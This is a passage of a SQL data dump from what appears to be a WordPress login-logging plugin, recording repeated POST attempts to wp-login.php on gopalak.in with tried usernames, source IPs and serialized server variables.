bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61051\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746739254.2331369;s:12:\"REQUEST_TIME\";i:1746739254;}}','35.154.1.88',1,'2025-05-09 02:50:55','2025-05-10 07:10:33'),(94961,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61060\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746739254.2377591;s:12:\"REQUEST_TIME\";i:1746739254;}}','35.154.1.88',1,'2025-05-09 02:50:55','2025-05-10 07:10:33'),(94962,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61058\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746739254.23715;s:12:\"REQUEST_TIME\";i:1746739254;}}','35.154.1.88',1,'2025-05-09 02:50:55','2025-05-10 07:10:31'),(94963,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61052\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746739254.2331941;s:12:\"REQUEST_TIME\";i:1746739254;}}','35.154.1.88',1,'2025-05-09 02:50:55','2025-05-10 07:10:32'),(94964,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61064\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746739255.850657;s:12:\"REQUEST_TIME\";i:1746739255;}}','35.154.1.88',1,'2025-05-09 02:50:57','2025-05-10 07:10:34'),(94965,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60128\";s:11:\"REMOTE_ADDR\";s:15:\"102.130.112.254\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746739798.1032729;s:12:\"REQUEST_TIME\";i:1746739798;}}','102.130.112.254',0,'2025-05-09 02:59:59','1970-01-01 00:00:00'),(94966,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54663\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746740484.4378531;s:12:\"REQUEST_TIME\";i:1746740484;}}','35.154.1.88',1,'2025-05-09 03:11:27','2025-05-10 07:10:33'),(94967,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54662\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746740484.4373569;s:12:\"REQUEST_TIME\";i:1746740484;}}','35.154.1.88',1,'2025-05-09 03:11:27','2025-05-10 07:10:32'),(94968,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54668\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746740486.252876;s:12:\"REQUEST_TIME\";i:1746740486;}}','35.154.1.88',1,'2025-05-09 03:11:27','2025-05-10 07:10:33'),(94969,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54667\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746740486.2523301;s:12:\"REQUEST_TIME\";i:1746740486;}}','35.154.1.88',1,'2025-05-09 03:11:27','2025-05-10 07:10:31'),(94970,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54669\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746740487.1965289;s:12:\"REQUEST_TIME\";i:1746740487;}}','35.154.1.88',1,'2025-05-09 03:11:28','2025-05-10 07:10:34'),(94971,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45626\";s:11:\"REMOTE_ADDR\";s:13:\"195.161.114.5\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746740929.028559;s:12:\"REQUEST_TIME\";i:1746740929;}}','195.161.114.5',0,'2025-05-09 03:18:50','1970-01-01 